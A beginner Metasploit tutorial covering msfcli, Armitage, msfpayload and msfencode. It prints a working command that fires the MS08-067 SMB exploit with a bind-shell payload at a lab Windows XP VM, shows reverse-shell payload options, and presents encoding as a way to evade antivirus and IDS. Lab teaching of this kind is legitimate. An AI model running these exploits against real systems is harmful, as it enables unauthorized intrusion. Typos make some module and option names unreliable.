Msfcli is another way to access the metasploit framework but focuses more on scripting and interpretability with other console-based tools. To view the msfcli help type:

root@bt:~# cd /opt/framework3/msf3
root@bt:~# msfcli -h

Now we are going to do a little test run of msfcli. It’s important to note whenever you’re learning metasploit and you get stuck, you can see the options in a module by adding the letter O to the end of the line. For example:

root@bt:~# msfcli windows/smb/ms08_067_netapt o

This module requires three options: RHOST, RPORT, and SMPIPE. Adding P to the end allows us to see what payloads we can use.

root@bt~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.101 P

we can run our exploit by selecting a payload, fill out the options, and run it by passing the letter E to the ned of the msfcli argument string.

root@bt~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.101 PAYLOAD=windows/shell/bind_tcp E

Note: the IP address assigned to RHOST is a windows XP machine that I have on a virtaul machine. It will act as our victim machine for testing. You will have to do the same with another computer or a virtual machine. For practice, do not update your victim machine or install anti-virus. We want to be able to use our exploits without them being patched over with windows updates. We will go over this more in-depth later on.

The armitage component is a fully interactive graphical user interface.
Running Armitage

Run the command armitage.
Select Start MSF.

MSFpayload

The msfpayload component of metasploit that generates shellcode, and executables. Shellcoe can bew generated in many formats including C, Ruby, JavaScript and even Visuabl Basic. Each output will be useful in various situations.

For msfpayload help type: root@bt~# msfpayload -h

Just like msfcli, if you need to find out the required options, append the letter O on the command line.

root@bt:~# msfpayload windows/shell_reverse_tcp O

MSFencode

The shellcode generated by msfpayload is functional, but it contains several null characters that, when interpreted by many programs, signify the end of a string, and this will cause the code to terminate before completion.

In addition, shellcode traversing a network in cleartext is likely to be picked up by intrusion detection systems (IDSs) and antivirus software. To address this problem, Metasploit’s developers offer msfencode, which helps you to avoid bad characters and evade antivirus and IDSs by encoding the original payload in a way that does not include “bad” characters.

Enter msfencode -h to see a list of msfencode options.

Metasploit contains a number of different encoders for different situations. Some will be useful when you can use only alphanumeric characters as part of a payload, as is the case with many file format exploits or other applications that accept only printable characters as input, while others are great general purpose encoders that do well in every situation. A very popular and well known encoder is the: x86/shikata_ga_nai encoder.

To see the list of encoders available, append -l to msfencode as shown next. The payloads are ranked in order of reliability.

root@bt:~# msfencode -l